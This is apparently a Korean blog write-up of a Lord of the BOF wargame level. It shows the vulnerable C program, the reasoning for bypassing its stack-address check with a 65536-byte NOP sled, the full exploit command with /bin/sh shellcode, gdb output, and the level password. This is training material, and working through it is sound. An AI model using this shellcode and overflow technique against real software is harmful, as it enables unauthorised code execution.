[LOB] troll -> vampire
2019. 7. 29. 01:28ㆍWargame & CTF/LOB
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 | /* The Lord of the BOF : The Fellowship of the BOF - vampire - check 0xbfff */ #include <stdio.h> #include <stdlib.h> main(int argc, char *argv[]) { char buffer[40]; if(argc < 2){ printf("argv error\n"); exit(0); } if(argv[1][47] != '\xbf') { printf("stack is still your friend.\n"); exit(0); } // here is changed! if(argv[1][46] == '\xff') { printf("but it's not forever\n"); exit(0); } strcpy(buffer, argv[1]); printf("%s\n", buffer); } | cs |
오버플로우 해서 RET을 변조시키면 되지만, argv[1][46]이 \xff이면 안된다. 즉, 0xbfff0000이면 안된다는 것이다.
0xbffe0000과 0xbfff0000의 차이는 65536이다. 스텍은 거꾸로 자라므로, 놉을 65536개 주고 \xbffe쪽에 있는 놉의 주소값을 RET에 넣으면 될것이다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 | [troll@localhost tmp]$ ./vampire `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"+"\x90"*65536+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿1h//shh/bin⏓ኂ° ̀ Segmentation fault (core dumped) [troll@localhost tmp]$ gdb -q vampire core Core was generated by `'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Reading symbols from /lib/ld-linux.so.2...done. #0 0xbfbfbfbf in ?? () (gdb) x/80x $esp 0xbffefac0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefad0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefae0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefaf0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefb00: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefb10: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefb20: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefb30: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefb40: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefb50: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefb60: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefb70: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefb80: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefb90: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefba0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefbb0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefbc0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefbd0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefbe0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffefbf0: 0x90909090 0x90909090 0x90909090 0x90909090 | cs |
0xbffefac0을 RET에 넣어주면 될것이다.
1 2 3 4 5 6 | [troll@localhost troll]$ ./vampire `python -c 'print "A"*44+"\xc0\xfa\xfe\xbf"+"\x90"*65536+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAzþ¿1h//shh/bin⏓ኂ° ̀ bash$ my-pass euid = 509 music world | cs |
vampire : music world
'Wargame & CTF > LOB' 카테고리의 다른 글
| [LOB] vampire -> skeleton (0) | 2019.07.29 |
|---|---|
| [LOB] orge -> troll (0) | 2019.07.29 |
| [LOB] darkelf -> orge (0) | 2019.07.29 |
| [LOB] wolfman -> darkelf (0) | 2019.07.28 |
| [LOB] orc -> wolfman (0) | 2019.07.28 |